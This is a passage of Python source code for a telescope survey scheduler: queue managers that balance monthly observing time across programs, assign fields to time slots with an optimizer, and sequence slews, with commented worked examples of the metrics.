target_program_fractions = {propid:0 for propid in PROGRAM_IDS
if propid != 0}
for op in self.observing_programs:
target_program_fractions[op.program_id] = \
op.program_observing_time_fraction
target_program_fractions = pd.Series(target_program_fractions)
target_program_fractions.index.name = 'program_id'
target_program_fractions.name = 'target_fraction'
target_program_nobs = target_program_fractions * total_obs
target_program_nobs.name = 'target_program_nobs'
# note that this gives 0 in case of no observations, as desired
# have to do the subtraction backwards because of Series/DataFrame
# API nonsense
delta_program_nobs = \
-1*obs_count_by_program.subtract(target_program_nobs,
axis=0)
NIGHTS_TO_REDISTRIBUTE = 5
time = Time(mjd_stop,format='mjd')
dtnow = time.to_datetime()
if dtnow.month != 12:
next_month_start_mjd = Time(datetime(dtnow.year,dtnow.month+1,1),
scale='utc').mjd
else:
next_month_start_mjd = Time(datetime(dtnow.year+1,1,1),
scale='utc').mjd
nights_left_this_month = np.round(next_month_start_mjd - time.mjd)
if nights_left_this_month > NIGHTS_TO_REDISTRIBUTE:
divisor = NIGHTS_TO_REDISTRIBUTE
else:
divisor = nights_left_this_month
if divisor == 0:
divisor = 1
delta_program_nobs /= divisor
delta_program_nobs = np.round(delta_program_nobs).astype(int)
return delta_program_nobs
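# Worked example (hypothetical numbers, not from the original code): suppose the
# month-to-date counts are {1: 900, 2: 1100, 3: 0} equivalent exposures against
# target fractions {1: 0.4, 2: 0.4, 3: 0.2}. With total_obs = 2000 the targets are
# {1: 800, 2: 800, 3: 400}, so the raw deltas (target minus observed) are
# {1: -100, 2: -300, 3: +400}. With more than NIGHTS_TO_REDISTRIBUTE nights left in
# the month, the deltas are spread over 5 nights, giving {1: -20, 2: -60, 3: +80}
# exposures of adjustment tonight.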
def adjust_subprogram_exposures_tonight(self, obs_log, mjd_start, mjd_stop):
"""Use past history to adjust the number of exposures per subprogram tonight.
Counts exposures from the start of the month and spreads any excess
over NIGHTS_TO_REDISTRIBUTE nights or the number of nights remaining
in the month, whichever is fewer."""
obs_count_by_subprogram_all = obs_log.count_equivalent_obs_by_subprogram(
mjd_range = [mjd_start, mjd_stop])
# drop engineering/commissioning
obs_count_by_subprogram_all = obs_count_by_subprogram_all[
obs_count_by_subprogram_all['program_id'] != 0]
obs_count_by_subprogram_all.set_index(['program_id','subprogram_name'],
inplace=True)
# only count the subprograms that are currently active. This is
# going to cause problems when the programs change--but we are going to
# only use the subprogram balance for i-band
obs_count_by_current_subprogram_dict = {}
# if there are no observations, add zeros
for op in self.observing_programs:
idx = (op.program_id, op.subprogram_name)
if idx not in obs_count_by_subprogram_all.index:
obs_count_by_current_subprogram_dict[idx] = 0
else:
obs_count_by_current_subprogram_dict[idx] = obs_count_by_subprogram_all.loc[idx,'n_obs']
obs_count_by_subprogram = pd.Series(obs_count_by_current_subprogram_dict)
obs_count_by_subprogram.name = 'n_obs'
obs_count_by_subprogram.index.set_names(
['program_id','subprogram_name'], inplace=True)
total_obs = obs_count_by_subprogram.sum()
# record the subprogram fractions
target_subprogram_fractions = defaultdict(float)
for op in self.observing_programs:
target_subprogram_fractions[(op.program_id, op.subprogram_name)] = \
op.program_observing_time_fraction * op.subprogram_fraction
target_subprogram_fractions = pd.Series(target_subprogram_fractions)
# target_program_fractions.index.name = 'program_id'
target_subprogram_fractions.name = 'target_fraction'
target_subprogram_nobs = target_subprogram_fractions * total_obs
target_subprogram_nobs.name = 'target_subprogram_nobs'
target_subprogram_nobs.index.set_names(
['program_id','subprogram_name'], inplace=True)
# note that this gives 0 in case of no observations, as desired
# have to do the subtraction backwards because of Series/DataFrame
# API nonsense
delta_subprogram_nobs = \
-1*obs_count_by_subprogram.subtract(target_subprogram_nobs,
axis=0).fillna(0)
NIGHTS_TO_REDISTRIBUTE = 5
time = Time(mjd_stop,format='mjd')
dtnow = time.to_datetime()
if dtnow.month != 12:
next_month_start_mjd = Time(datetime(dtnow.year,dtnow.month+1,1),
scale='utc').mjd
else:
next_month_start_mjd = Time(datetime(dtnow.year+1,1,1),
scale='utc').mjd
nights_left_this_month = np.round(next_month_start_mjd - time.mjd)
if nights_left_this_month > NIGHTS_TO_REDISTRIBUTE:
divisor = NIGHTS_TO_REDISTRIBUTE
else:
divisor = nights_left_this_month
if divisor == 0:
divisor = 1
delta_subprogram_nobs /= divisor
delta_subprogram_nobs = np.round(delta_subprogram_nobs).astype(int)
return delta_subprogram_nobs
def determine_allowed_requests(self, time, obs_log,
timed_obs_count = defaultdict(int)):
"""Use count of past observations and expected observing time fractions
to determine number of allowed requests tonight.
Exclude observations already planned in timed queues."""
self.requests_allowed = {}
# rather than using equivalent obs, might be easier to work in
# exposure time directly?
# enforce program balance on a monthly basis
dtnow = time.to_datetime()
month_start_mjd = Time(datetime(dtnow.year,dtnow.month,1),
scale='utc').mjd
delta_program_exposures_tonight = self.adjust_program_exposures_tonight(
obs_log, month_start_mjd, time.mjd)
# use this for i-band only
delta_subprogram_exposures_tonight = self.adjust_subprogram_exposures_tonight(
obs_log, month_start_mjd, time.mjd)
self.logger.info(f'Change in allowed exposures: {delta_program_exposures_tonight}')
self.logger.info(f'Needed change in allowed exposures by subprogram: {delta_subprogram_exposures_tonight}')
self.logger.debug(f"Sum of change in allowed exposures by subprogram: {delta_subprogram_exposures_tonight.reset_index().groupby('program_id').agg(np.sum)}")
self.logger.info(f'Number of timed observations: {timed_obs_count}')
dark_time = approx_hours_of_darkness(time)
# calculate subprogram fractions excluding list queues and TOOs
scheduled_subprogram_sum = defaultdict(float)
for op in self.observing_programs:
# list queues and TOOs should set field_ids = [], but not None
# OPs scheduled using field_selection_function will have
# field_ids = None
if op.field_ids is not None:
if len(op.field_ids) == 0:
continue
scheduled_subprogram_sum[op.program_id] += \
op.subprogram_fraction
for op in self.observing_programs:
program_time_tonight = (
dark_time * op.program_observing_time_fraction +
(delta_program_exposures_tonight.loc[op.program_id,'n_obs']
- timed_obs_count[op.program_id]) * (EXPOSURE_TIME+READOUT_TIME))
subprogram_time_tonight = (
program_time_tonight * op.subprogram_fraction /
scheduled_subprogram_sum[op.program_id])
n_requests = (subprogram_time_tonight.to(u.min) /
op.time_per_exposure().to(u.min)).value[0]
n_requests = np.round(n_requests).astype(int)
# i_band program balance needs individual tuning due to
# longer cadence and filter blocking
if op.subprogram_name == 'i_band':
delta_i_nexp = delta_subprogram_exposures_tonight.loc[(2,'i_band')]
if delta_i_nexp > 0:
self.logger.info(f'Adding {delta_i_nexp} additional i-band exposures')
n_requests += delta_i_nexp
else:
self.logger.info(f'Implied change in i-band exposures is negative, skipping supplementation: {delta_i_nexp}')
self.requests_allowed[(op.program_id,
op.subprogram_name)] = n_requests
for key, n_requests in self.requests_allowed.items():
if n_requests < 0:
self.requests_allowed[key] = 0
self.logger.info(self.requests_allowed)
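# Illustrative sketch (hypothetical values): after determine_allowed_requests runs,
# self.requests_allowed maps (program_id, subprogram_name) tuples to integer request
# counts, e.g.
#
#     {(1, 'example_all_sky'): 320, (2, 'example_high_cadence'): 180, (2, 'i_band'): 40}
#
# Negative values are clipped to zero by the loop above; the subprogram names and
# numbers here are made up for illustration only.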
def next_obs(self, current_state, obs_log):
"""Given current state, return the parameters for the next request"""
# don't store the telescope state locally!
# check that assign_nightly_requests has been called tonight.
if self.queue_type != 'list':
if np.floor(current_state['current_time'].mjd) != self.queue_night:
self.assign_nightly_requests(current_state, obs_log)
# define functions that actually do the work in subclasses
next_obs = self._next_obs(current_state, obs_log)
# check if we have a disallowed observation, and reject it:
if next_obs['target_limiting_mag'] < 0:
self.logger.warning(f'Target is unobservable! Removing from queue {next_obs}')
self.remove_requests(next_obs['request_id'])
next_obs = self.next_obs(current_state, obs_log)
next_obs['queue_name'] = self.queue_name
return next_obs
def update_queue(self, current_state, obs_log, **kwargs):
"""Recalculate queue"""
# define functions that actually do the work in subclasses
return self._update_queue(current_state, obs_log)
def remove_requests(self, request_id):
"""Remove a request from both the queue and the request set pool"""
# define functions that actually do the work in subclasses
return self._remove_requests(request_id)
def return_queue(self):
"""Return queue values, ordered in the expected sequence if possible"""
queue = self._return_queue()
cols = ['field_id','filter_id','exposure_time','program_id',
'subprogram_name','ra','dec','ordered']
if self.queue_type == 'gurobi':
cols.append('slot_start_time')
if self.queue_type == 'list':
cols.append('mode_num')
cols.append('ewr_num_images')
return queue.loc[:,cols]
class GurobiQueueManager(QueueManager):
def __init__(self, queue_name, queue_configuration, **kwargs):
super().__init__(queue_name, queue_configuration, **kwargs)
self.block_obs_number = 0
self.queue_type = 'gurobi'
def _assign_nightly_requests(self, current_state,
time_limit = 30.*u.second, block_use = defaultdict(float)):
self._assign_slots(current_state, time_limit = time_limit,
block_use = block_use)
def _next_obs(self, current_state, obs_log):
"""Select the highest value request."""
# do the slot assignment at the beginning of the night
# (or if the queue is empty, which should be unusual)
# if we've entered a new block, solve the TSP to sequence the requests
if (block_index(current_state['current_time'])[0] != self.queue_slot):
try:
self._move_requests_to_missed_obs(self.queue_slot)
except Exception as e:
self.logger.exception(e)
self.logger.error('Failed moving requests to missed obs!')
self._sequence_requests_in_block(current_state)
if (len(self.queue_order) == 0):
raise QueueEmptyError("Ran out of observations this block.")
idx = self.queue_order[0]
row = self.queue.loc[idx]
if self.queue_slot in self.filter_by_slot:
filter_id = int(self.filter_by_slot[self.queue_slot])
else:
raise QueueEmptyError("No requests in this slot!")
next_obs = {'target_field_id': int(row['field_id']),
'target_ra': row['ra'],
'target_dec': row['dec'],
'target_filter_id': filter_id,
'target_program_id': int(row['program_id']),
'target_subprogram_name': row['subprogram_name'],
'target_program_pi': row['program_pi'],
'target_exposure_time': row['exposure_time'] * u.second,
'target_sky_brightness':
self.block_sky_brightness.loc[idx,self.queue_slot][filter_id],
'target_limiting_mag':
self.block_lim_mags.loc[idx,self.queue_slot][filter_id],
'target_metric_value':
self.block_slot_metric.loc[idx,self.queue_slot][filter_id],
'target_total_requests_tonight': int(row['total_requests_tonight']),
'target_mode_num': 0,
'target_num_images': 1,
'request_id': idx}
# 'target_sky_brightness': self.queue.ix[idx].sky_brightness,
# 'target_limiting_mag': self.queue.ix[idx].limiting_mag,
# 'target_metric_value': self.queue.ix[idx].value,
# 'target_request_number_tonight':
return next_obs
def _slot_metric(self, limiting_mag, dec):
"""Calculate metric for assigning fields to slots.
penalizes volume for both extinction (airmass) and fwhm penalty
due to atmospheric refraction, plus sky brightness from
moon phase and distance
== 1 for 21st mag.
normalize metrics by maximum value at transit
so low-declination fields are not penalized
"""
#see 200430 notes
metric = (10.**(0.6 * (limiting_mag - 21)) /
(1-1e-4*(maximum_altitude(dec) - 90)**2.))
# lock out -99 limiting mags even more aggressively
return metric.where(limiting_mag > 0, -0.99)
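# Worked example (hypothetical inputs): for a field with limiting_mag = 20.5 the
# volume factor is 10**(0.6 * (20.5 - 21)) ~= 0.50, and for a field whose maximum
# altitude is 80 deg the declination normalization is 1 / (1 - 1e-4 * (80 - 90)**2)
# ~= 1.01, giving a slot metric of roughly 0.51. Fields with limiting_mag <= 0 are
# forced to -0.99 so the optimizer never selects them.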
def _assign_slots(self, current_state, time_limit = 30*u.second,
block_use = defaultdict(float)):
"""Assign requests in the Pool to slots"""
# check that the pool has fields in it
if len(self.rp.pool) == 0:
raise QueueEmptyError("No fields in pool")
# join with fields so we have the information we need
# make a copy so rp.pool and self.queue are not linked
df = self.rp.pool.join(self.fields.fields, on='field_id').copy()
# calculate limiting mag by block. uses the block midpoint time
blocks, times = nightly_blocks(current_state['current_time'],
time_block_size=TIME_BLOCK_SIZE)
# remove the excluded blocks, if any. Could do this in optimize.py
# but it makes the optimization problem unnecessarily bigger
# don't demand 100% of the block is used: tiny fractions lead to
# infeasible models
exclude_blocks = [b for (b,v) in block_use.items() if v > 0.95]
self.logger.debug(f'Excluding completely filled blocks {exclude_blocks}')
if len(exclude_blocks):
cut_blocks = np.setdiff1d(blocks, exclude_blocks)
cut_times = block_index_to_time(cut_blocks,
current_state['current_time'], where='mid')
blocks, times = cut_blocks, cut_times
lim_mags = {}
sky_brightnesses = {}
decs = {}
for bi, ti in zip(blocks, times):
if 'altitude' in df.columns:
df.drop('altitude', axis=1, inplace=True)
if 'azimuth' in df.columns:
df.drop('azimuth', axis=1, inplace=True)
# use pre-computed blocks
df_alt = self.fields.block_alt[bi]
df_alt.name = 'altitude'
df = df.join(df_alt, on='field_id')
df_az = self.fields.block_az[bi]
df_az.name = 'azimuth'
df = df.join(df_az, on='field_id')
for fid in FILTER_IDS:
df_limmag, df_sky = \
compute_limiting_mag(df, ti, self.fields.Sky,
filter_id = fid)
lim_mags[(bi, fid)] = df_limmag
sky_brightnesses[(bi, fid)] = df_sky
decs[(bi, fid)] = df.dec
# this results in a MultiIndex on the *columns*: level 0 is block,
# level 1 is filter_id. df_metric.unstack() flattens it
self.block_lim_mags = pd.DataFrame(lim_mags)
self.block_sky_brightness = pd.DataFrame(sky_brightnesses)
block_decs = pd.DataFrame(decs)
self.block_slot_metric = self._slot_metric(self.block_lim_mags,
block_decs)
# count the number of observations requested by filter
df['n_reqs_tot'] = 0
for fid in FILTER_IDS:
df['n_reqs_{}'.format(fid)] = \
df.filter_ids.apply(lambda x: np.sum([xi == fid for xi in x]))
df['n_reqs_tot'] += df['n_reqs_{}'.format(fid)]
# prepare the data for input to gurobi
#import shelve
#s = shelve.open('tmp_vars.shelf')
#s['block_lim_mags'] = self.block_lim_mags
#s['block_slot_metric'] = self.block_slot_metric
#s['df'] = df
#s.close()
self.request_sets_tonight, df_slots, dft = night_optimize(
self.block_slot_metric, df, self.requests_allowed,
time_limit = time_limit, block_use = block_use)
grp = df_slots.groupby('slot')
self.queued_requests_by_slot = grp['request_id'].apply(list)
self.filter_by_slot = \
grp['metric_filter_id'].apply(lambda x: np.unique(x)[0])
# rework to dump output
df_slots['scheduled'] = True
dft.set_index(['request_id','slot','metric_filter_id'],inplace=True)
df_slots.set_index(['request_id','slot','metric_filter_id'],inplace=True)
dft = dft.join(df_slots,how='outer')
dft['scheduled'] = dft['scheduled'].fillna(False)
dft.reset_index(inplace=True)
dft = pd.merge(dft,df[['field_id']],
left_on='request_id', right_index=True)
n_requests_scheduled = np.sum(dft['scheduled'])
total_metric_value = np.sum(dft['scheduled']*dft['metric'])
avg_metric_value = total_metric_value / n_requests_scheduled
tot_avail_requests_bysubprogram = \
df.groupby(['program_id','subprogram_name'])['n_reqs_tot'].agg(np.sum)
tot_avail_requests_bysubprogram.name = 'available'
# use self.requests_allowed and join this all up
nscheduled_requests_bysubprogram = \
dft.loc[dft['scheduled'],['program_id','subprogram_name']].groupby(['program_id','subprogram_name']).agg(len)
nscheduled_requests_bysubprogram.name = 'scheduled'
# reformat requests_allowed for joining
mux = pd.MultiIndex.from_tuples(self.requests_allowed.keys(),
names = ['program_id','subprogram_name'])
df_allowed = pd.DataFrame(list(self.requests_allowed.values()),
index=mux,columns=['allowed'])
df_summary = df_allowed.join(tot_avail_requests_bysubprogram).join(nscheduled_requests_bysubprogram)
self.logger.info(df_summary)
self.logger.info(f'{n_requests_scheduled} requests scheduled')
self.logger.info(f'{total_metric_value:.2f} total metric value; '
f'{avg_metric_value:.2f} average per request')
# this is not ideal for
tnow = current_state['current_time']
yymmdd = tnow.iso.split()[0][2:].replace('-','')
solution_outfile = f'{BASE_DIR}/../sims/gurobi_solution_{yymmdd}.csv'
before_noon_utc = (tnow.mjd - np.floor(tnow.mjd)) < 0.5
# avoid clobbering the solution file with restarts after observing has
# completed
if before_noon_utc or (not os.path.exists(solution_outfile)):
dft.drop(columns=['Yrtf']).to_csv(solution_outfile)
def _sequence_requests_in_block(self, current_state):
"""Solve the TSP for requests in this slot"""
self.queue_slot = block_index(current_state['current_time'])[0]
# raise an error if there are missing blocks--potentially due to
# excluded blocks
if self.queue_slot not in self.queued_requests_by_slot.index:
raise QueueEmptyError(f"Current block {self.queue_slot} is not stored")
# retrieve requests to be observed in this block
req_list = self.queued_requests_by_slot.loc[self.queue_slot]
# request_set ids should be unique per block
assert( (len(set(req_list)) == len(req_list) ) )
if np.all(np.isnan(req_list)):
raise QueueEmptyError("No requests assigned to this block")
idx = pd.Index(req_list)
# reconstruct
df = self.rp.pool.loc[idx].join(self.fields.fields, on='field_id').copy()
az = self.fields.block_az[self.queue_slot]
df = df.join(az, on='field_id')
# now prepend the CALSTOW position so we can minimize slew from
# filter exchanges
# Need to use current HA=0
df_blockstart = pd.DataFrame({'ra':HA_to_RA(0,
current_state['current_time']).to(u.degree).value,
'dec':-48.,'azimuth':180.},index=[0])
df_fakestart = pd.concat([df_blockstart,df],sort=True)
# compute overhead time between all request pairs
# compute pairwise slew times by axis for all pointings
slews_by_axis = {}
def coord_to_slewtime(coord, axis=None):
c1, c2 = np.meshgrid(coord, coord)
dangle = np.abs(c1 - c2)
angle = np.where(dangle < (360. - dangle), dangle, 360. - dangle)
return slew_time(axis, angle * u.deg)
slews_by_axis['dome'] = coord_to_slewtime(
df_fakestart['azimuth'], axis='dome')
slews_by_axis['dec'] = coord_to_slewtime(
df_fakestart['dec'], axis='dec')
slews_by_axis['ra'] = coord_to_slewtime(
df_fakestart['ra'], axis='ha')
maxradec = np.maximum(slews_by_axis['ra'], slews_by_axis['dec'])
maxslews = np.maximum(slews_by_axis['dome'], maxradec)
# impose a penalty on zero-length slews (which by construction
# in this mode are from different programs)
wnoslew = maxslews == 0
maxslews[wnoslew] = READOUT_TIME * 10.
overhead_time = np.maximum(maxslews, READOUT_TIME)
tsp_order, tsp_overhead_time = tsp_optimize(overhead_time.value)
# remove the fake starting point. tsp_optimize always starts with
# the first observation in df, which by construction is our fake point,
# so we can simply cut it off.
tsp_order = tsp_order[1:]
assert(0 not in tsp_order)
# tsp_order is 0-indexed from overhead time, so I need to
# reconstruct the request_id
self.queue_order = df_fakestart.index.values[tsp_order]
self.queue = df
def _move_requests_to_missed_obs(self, queue_slot):
"""After a block is expired, move any un-observed requests into the missed_obs queue."""
#self.queue should have any remaining obs
if len(self.queue):
cols = ['program_id', 'subprogram_name', 'program_pi', 'field_id',
'intranight_gap_min', 'exposure_time', 'priority']
# it's a little confusing, because each queue entry has all of the
# filter_ids from the original request set. So we have to
# make a pool that only has single filters in it.
filter_id = int(self.filter_by_slot[queue_slot])
missed_obs = self.queue.loc[:,cols].copy()
missed_obs['filter_ids'] = pd.Series([[filter_id] for i in missed_obs.index],index=missed_obs.index)
missed_obs['total_requests_tonight'] = 1
self.logger.info(f"Saving {len(missed_obs)} requests (filter {filter_id}) to the missed_obs queue: {missed_obs.loc[:,['subprogram_name','field_id']]}")
# the missed obs RequestPool wants request *sets*, so find out
# if previous requests were missed
rows_to_append = []
for idx, row in missed_obs.iterrows():
if idx in self.missed_obs_queue.rp.pool.index:
# the request set should appear exactly once in the missed-obs pool
assert np.sum(self.missed_obs_queue.rp.pool.index == idx) == 1
self.missed_obs_queue.rp.pool.loc[idx,'filter_ids'].append(filter_id)
self.missed_obs_queue.rp.pool.loc[idx,'total_requests_tonight'] += 1
else:
rows_to_append.append(row)
self.missed_obs_queue.rp.pool = self.missed_obs_queue.rp.pool.append(rows_to_append)
else:
self.logger.debug(f'No remaining queued observations in slot {queue_slot}')
def _remove_requests(self, request_set_id):
"""Remove a request from both the queue and the pool.
Note that gurobi queue uses request_set_id to index."""
# should be the topmost item
assert (self.queue_order[0] == request_set_id)
self.queue_order = self.queue_order[1:]
row = self.queue.loc[request_set_id]
self.queue = self.queue.drop(request_set_id)
# (past slot assignments are still in self.queued_requests_by_slot)
# (we will only reuse the RequestPool if we do recomputes)
self.rp.remove_request(request_set_id,
self.filter_by_slot.loc[self.queue_slot])
def _return_queue(self):
# start by setting up the current slot
if len(self.queue) > 0:
queue = self.queue.loc[self.queue_order].copy()
queue.loc[:,'ordered'] = True
queue.loc[:,'slot_start_time'] = block_index_to_time(
self.queue_slot, Time.now(), where='start').iso
else:
# before the night starts, the queue is empty
queue = self.queue.copy()
# now loop over upcoming slots, ensuring they are sorted (should be)
slots = self.queued_requests_by_slot.index.values
slots = np.sort(slots)
for slot in slots:
if (self.queue_slot is not None):
if slot <= self.queue_slot:
continue
slot_requests = self.queued_requests_by_slot.loc[slot]
idx = pd.Index(slot_requests)
# reconstruct
df = self.rp.pool.loc[idx].join(self.fields.fields, on='field_id').copy()
df.loc[:,'filter_id'] = self.filter_by_slot[slot]
df.loc[:,'ordered'] = False
df.loc[:,'slot_start_time'] = block_index_to_time(slot,
Time.now(), where='start').iso
queue = queue.append(df)
return queue
class GreedyQueueManager(QueueManager):
def __init__(self, queue_name, queue_configuration, **kwargs):
super().__init__(queue_name, queue_configuration, **kwargs)
self.time_of_last_filter_change = None
self.min_time_before_filter_change = TIME_BLOCK_SIZE
self.queue_type = 'greedy'
def _assign_nightly_requests(self, current_state,
time_limit = 30.*u.second, block_use = defaultdict(float)):
# initialize the time of last filter change
if self.time_of_last_filter_change is None:
self.time_of_last_filter_change = current_state['current_time']
def _next_obs(self, current_state, obs_log):
"""Select the highest value request."""
# since this is a greedy queue, we update the queue after each obs
# for speed, only do the whole recalculation if we're in a new slot
# if ((block_index(current_state['current_time'])[0] != self.queue_slot)
# or (len(self.queue) == 0)):
# self._update_queue(current_state)
# else:
# # otherwise just recalculate the overhead times
# _ = self._update_overhead(current_state)
# to get the "on the fly" cadence windows to work I have to
# run the whole queue every time right now...
self._update_queue(current_state, obs_log)
# in case this wasn't initialized by assign_nightly_requests
if self.time_of_last_filter_change is None:
self.time_of_last_filter_change = current_state['current_time']
# check if filter changes are allowed yet
if ((current_state['current_time'] - self.time_of_last_filter_change)
< self.min_time_before_filter_change):
# only consider observations in the current filter
queue = self.queue[self.queue['filter_id'] == current_state['current_filter_id']]
# unless there are no more observations, in which case allow a
# change
if len(queue) == 0:
queue = self.queue
else:
# allow filter changes if desired
queue = self.queue
# request_id of the highest value request
max_idx = queue.value.idxmax()
row = queue.loc[max_idx]
next_obs = {'target_field_id': row['field_id'],
'target_ra': row['ra'],
'target_dec': row['dec'],
'target_filter_id': row['filter_id'],
'target_program_id': row['program_id'],
'target_subprogram_name': row['subprogram_name'],
'target_program_pi': row['program_pi'],
'target_exposure_time': row['exposure_time'] * u.second,
'target_sky_brightness': row['sky_brightness'],
'target_limiting_mag': row['limiting_mag'],
'target_metric_value': row['value'],
'target_total_requests_tonight': row['total_requests_tonight'],
'target_mode_num': 0,
'target_num_images': 1,
'request_id': max_idx}
return next_obs
def _metric(self, df):
"""Calculate metric for prioritizing fields.
Penalizes volume for both extinction (airmass) and fwhm penalty
due to atmospheric refraction, plus sky brightness from
moon phase and distance, overhead time
== 1 for 21st mag, 15 sec overhead.
Normalize by value at transit."""
return 10.**(0.6 * (df['limiting_mag'] - 21)) / \
(1-1e-4*(maximum_altitude(df['dec']) - 90)**2.) / \
((EXPOSURE_TIME.value + df['overhead_time']) /
(EXPOSURE_TIME.value + 10.))
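# Worked example (hypothetical inputs): the greedy metric is the slot-style volume
# term divided by a slew/readout penalty. Assuming EXPOSURE_TIME = 30 s for
# illustration, a request with overhead_time = 10 s scores the same as the slot
# metric, while one with overhead_time = 30 s is down-weighted by
# (30 + 30) / (30 + 10) = 1.5x. The code itself uses the EXPOSURE_TIME constant.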
def _update_overhead(self, current_state, df=None):
"""recalculate overhead values without regenerating whole queue"""
inplace = df is None
if inplace:
# no dataframe supplied, so replace existing self.queue on exit
df = self.queue
df.drop(['overhead_time', 'altitude', 'azimuth'], axis=1,
inplace=True)
# compute readout/slew overhead times, plus current alt/az
df_overhead, df_altaz = self.fields.overhead_time(current_state)
# nb: df has index request_id, not field_id
df = pd.merge(df, df_overhead, left_on='field_id', right_index=True)
df = pd.merge(df, df_altaz, left_on='field_id', right_index=True)
df.rename(columns={'alt': 'altitude', 'az': 'azimuth'}, inplace=True)
# add overhead for filter changes
w = df['filter_id'] != current_state['current_filter_id']
if np.sum(w):
df.loc[w, 'overhead_time'] += FILTER_CHANGE_TIME.to(u.second).value
if inplace:
df.loc[:, 'value'] = self._metric(df)
self.queue = df
return df
def _update_queue(self, current_state, obs_log):
"""Calculate greedy weighting of requests in the Pool using current
telescope state only"""
# store block index for which these values were calculated
self.queue_slot = block_index(current_state['current_time'])[0]
# check that the pool has fields in it
if len(self.rp.pool) == 0:
raise QueueEmptyError("No fields in pool")
# join with fields so we have the information we need
# make a copy so rp.pool and self.queue are not linked
df_rs = self.rp.pool.join(self.fields.fields, on='field_id').copy()
# now expand the dataframe of request sets to a dataframe with one
# row per obs.
requests = []
for request_set_id, row in df_rs.iterrows():
rdict = row.to_dict()
filter_ids = rdict.pop('filter_ids')
for filter_id in filter_ids:
ri = rdict.copy()
ri['filter_id'] = filter_id
ri['request_set_id'] = request_set_id
requests.append(ri)
df = pd.DataFrame(requests)
df = self._update_overhead(current_state, df=df)
# start with conservative altitude cut;
# airmass weighting applied naturally below
# also make a copy because otherwise it retains knowledge of
# (discarded) previous reference and raises SettingWithCopyWarnings
df = df.loc[df['altitude'] > 20, :].copy()
if len(df) == 0:
raise QueueEmptyError("No fields in queue above altitude cut")
# if restricting to one program per block, drop other programs
if self.block_programs:
current_block_program = PROGRAM_BLOCK_SEQUENCE[
self.queue_slot % LEN_BLOCK_SEQUENCE]
df = df.loc[df['program_id'] == current_block_program, :]
cadence_cuts = enough_gap_since_last_obs(df,
current_state,obs_log)
self.requests_in_window = np.sum(cadence_cuts) > 0
if not self.requests_in_window:
self.logger.warning(calc_queue_stats(df, current_state,
intro="No fields with observable cadence windows. Queue in progress:"))
raise QueueEmptyError("No fields with observable cadence windows")
# also make a copy because otherwise it retains knowledge of
# (discarded) previous reference and raises SettingWithCopyWarnings
df = df.loc[cadence_cuts, :].copy()
# compute airmasses by field_id
# airmass = zenith_angle_to_airmass(90. - df_alt)
# airmass.name = 'airmass'
# df = pd.merge(df, pd.DataFrame(airmass),
# left_on='field_id', right_index=True)
# airmass cut (or add airmass weighting to value below)
# df = df[(df['airmass'] <= MAX_AIRMASS) & (df['airmass'] > 0)]
df_limmag, df_sky = compute_limiting_mag(df,
current_state['current_time'], self.fields.Sky)
df.loc[:, 'limiting_mag'] = df_limmag
df.loc[:, 'sky_brightness'] = df_sky
#df_limmag.name = 'limiting_mag'
#df = pd.merge(df, df_limmag, left_on='field_id', right_index=True)
df.loc[:, 'value'] = self._metric(df)
self.queue = df
def _remove_requests(self, request_id):
"""Remove a request from both the queue and the request pool"""
row = self.queue.loc[request_id]
self.queue = self.queue.drop(request_id)
self.rp.remove_request(row['request_set_id'], row['filter_id'])
def _return_queue(self):
if 'value' in self.queue.columns:
queue = self.queue.sort_values('value',ascending=False).copy()
else:
queue = self.queue.copy()
# we have put these in value order but the sequence can change
queue['ordered'] = False
return queue
class ListQueueManager(QueueManager):
"""Simple Queue that returns observations in order."""
def __init__(self, queue_name, queue_configuration, fields=None, **kwargs):
self.queue_type = 'list'
# queue name (useful in Scheduler object when swapping queues)
self.queue_name = queue_name
if fields is None:
self.fields = Fields()
else:
self.fields = fields
# the queue itself
self.load_list_queue(queue_configuration.config['targets'])
if 'validity_window_mjd' in queue_configuration.config:
window = queue_configuration.config['validity_window_mjd']
if window is not None:
assert(len(window) == 2)
assert(window[1] > window[0])
self.validity_window = [Time(window[0],format='mjd'),
Time(window[1],format='mjd')]
else:
self.validity_window = None
else:
self.validity_window = None
self.is_TOO = queue_configuration.config['targets'][0]['subprogram_name'].startswith('ToO')
def _assign_nightly_requests(self, current_state,
**kwargs):
pass
def _update_queue(self, current_state, obs_log):
pass
def load_list_queue(self, queue_dict_list, append=False):
"""Initialize an ordered queue.
queue_dict_list is a list of dicts, one per observation"""
df = pd.DataFrame(queue_dict_list)
# check that major columns are included
required_columns = ['field_id','program_id', 'subprogram_name',
'filter_id', 'program_pi']
for col in required_columns:
if col not in df.columns:
raise ValueError(f'Missing required column {col}')
# by default use field ids alone to specify pointings,
# but allow manual ra/dec if needed
if ('ra' not in df.columns) and ('dec' not in df.columns):
queue = df.join(self.fields.fields, on='field_id', how='inner').sort_index().copy()
else:
queue = df
# if some of the field ids are bad, there will be missing rows
if len(queue) != len(df):
raise ValueError('One or more field ids are malformed: {}'.format(
df.index.difference(self.fields.fields.index)))
# add standard keywords if not present
if 'exposure_time' not in queue.columns:
queue['exposure_time'] = EXPOSURE_TIME.to(u.second).value
if 'max_airmass' not in queue.columns:
queue['max_airmass'] = MAX_AIRMASS
if 'n_repeats' not in queue.columns:
queue['n_repeats'] = 1
if 'mode_num' not in queue.columns:
queue['mode_num'] = 0
if 'ewr_num_images' not in queue.columns:
# _return_queue also expects this column, so add it with the default
queue['ewr_num_images'] = 1
queue['num_images'] = queue['ewr_num_images']
if append:
self.queue = self.queue.append(queue, ignore_index=True)
else:
self.queue = queue
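# Illustrative sketch (hypothetical values): each element of queue_dict_list is a
# plain dict with at least the required columns checked above, e.g.
#
#     {'field_id': 650, 'program_id': 2, 'subprogram_name': 'ToO_example',
#      'filter_id': 2, 'program_pi': 'Example_PI'}
#
# Optional keys such as 'exposure_time', 'max_airmass', 'n_repeats' and 'mode_num'
# fall back to the defaults assigned above. The specific field, program, and PI
# values shown here are made up for illustration.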
def _next_obs(self, current_state, obs_log):
"""Return the next observation in the time ordered queue unless it has expired."""
if len(self.queue) == 0:
raise QueueEmptyError("No more observations in queue!")
# take the next observation in line
idx = 0
while True:
if idx == len(self.queue):
raise QueueEmptyError("No valid observations in queue!")
ra = self.queue.iloc[idx].ra
ha = RA_to_HA(ra * u.degree, current_state['current_time']
).to(u.degree).wrap_at(180.*u.degree).value
dec = self.queue.iloc[idx].dec
sc = coord.SkyCoord(ra,dec, unit=u.deg)
airmass = altitude_to_airmass(
skycoord_to_altaz(sc,
current_state['current_time']).alt.to(u.deg).value)
if airmass >= self.queue.iloc[idx].max_airmass:
idx += 1
continue
# Reed limits |HA| to < 5.95 hours (most relevant for circumpolar
